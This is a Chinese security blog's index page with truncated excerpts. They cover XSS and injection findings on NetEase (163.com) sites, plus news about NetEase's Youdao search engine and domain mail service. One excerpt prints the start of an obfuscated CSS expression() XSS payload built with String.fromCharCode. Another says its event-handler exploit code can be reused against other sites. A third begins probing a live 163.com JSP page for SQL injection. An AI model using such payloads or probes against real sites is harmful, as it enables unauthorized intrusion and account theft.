鬼仔's Blog

作者：刺

因为我认识的朋友里面国内各大网站都有，前两天发了校内网的bug，可是现在多了个校内网的朋友，不太好意思发那些例子。正好不认识网易的人，那就发网易的漏洞做典型吧，也许还能让我们的whitehat社区趁机扩大下。

先说跨域实现的笔记，再讲漏洞。

今天本来不是研究这个跨域实现问题，不过顺道看到了这个，做下笔记，暂时还没想到有什么安全隐患，哪位有创意的朋友可以仔细思考下里面是否存在问题，我也会找时间好好想想。
阅读全文 »

来源http://www.leapar.com/web/Article/ShowArticle.asp?ArticleID=475

<html>
<style>
body {
width:
expression(eval(String.fromCharCode(0x69,0x66,0x28,0x21,0x77,0x69,0x6e,
0x64,0x6f,0x77,0x2e,0x78,0x78,0x78,0x29,0x7b,0x77,

0x69,0x6e,0x64,0x6f,0x77,0x2e,0x78,0x78,0x78,0x3d,0x31,0x3b,
0x69,0x66,0x28,0x64,0x6f,

0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x62,0x6f,0x64,0x79,0x29,0x7b,
阅读全文 »

来源：梦之光芒

本以为网易博客的安全性应该跟百度差不多，但这一看似乎还有些距离。有待改进哦！

这次测试的仅仅是事件触发式漏洞，对于90余个出发点，百度仅仅落掉4个：onbeforeupdate、ondataavailable、 onrowsdelete、onrowsinserted。并且这四个的利用都需要xml的支持，利用困难；而网易仅仅过滤了不到30个。（这里需要说明一下，漏洞和利用是两码事，不是所有漏洞都可以利用的；所以以后大家发现某站点的XSS点，不要大叫大嚷了，只会让别人笑话而已。Monyer也仅作学术研究，没太多技术而言！）

这里Monyer对其中相对容易触发的30余个事件写出利用程式，并且尽量利用div等常用免过滤标签，这些程式都是通用了，所以你可以直接拿过来去测试其他站点。
阅读全文 »

网易今天偷偷发布一个产品—- 有道 ，从youdao上面放的那个ICP证号码来看，可以确认是网易的。
据说是网易开发独立的搜索引擎。

访问：http://www.yodao.com/

信息来源：cnBeta

继Google,微软,搜狗之后,网易126也提供以你的域名为后缀的电子邮局了.整个邮局空间是100G,自定义首页,配备全国最大最稳定的网易邮件系统!

我的huaidan.org申请google的邮局一直没通过，但是另外一个域名却一次就成功了，好是郁闷。。
现在网易也推出这样的服务了，我就用huaidan.org申请了一个，正等着MX记录生效。

暂时不确定是否免费，有可能是收费的。服务条款里有这样一句：

网易Domain邮箱服务系统所有权、经营管理权和解释权归网易公司所有。用户如需使用该项服务，须仔细阅读并严格遵守网易制定的《网易Domain邮箱服务条款》（以下简称"本条款"），完成其他注册程序和缴纳所需费用之后，才能成为网易Domain邮箱服务的用户。

阅读全文 »

信息来源：Neeao's Security Blog
已发表于黑客X档案

BY 剑心[B.C.T]
转载注明出处

163.com是国内一家比较出名的门户网站，提供包括邮箱等等在内的各种服务，这样繁多的服务，不知道会不会在哪些地方存在漏洞哦！正好最近学习了一些注入知识就想对这些门户网站做点小小的安全检测，不知道他们的脚本像不像他们名声一样那么厉害哦！
废话就不说了，我们就去找那些传递参数的页面看看会不会不小心有那么一个参数没有过滤，那么我们就有空子可以钻了哦！网易的脚本基本上是采取的jsp和Php的形式，主站看样子是静态的，就不说了，其他的站那么多的jsp和php应该有问题吧！Php注入也被人研究烂了，注入的时候被Php的那个特性拦着也相当的不舒服，所以干脆就去找jsp的脚本，希望能找到一些没有过滤的参数。找了能打两把CS的工夫还真让我找到一个页面http://XXX.163.com/wap/content.jsp?id=120 阅读全文 »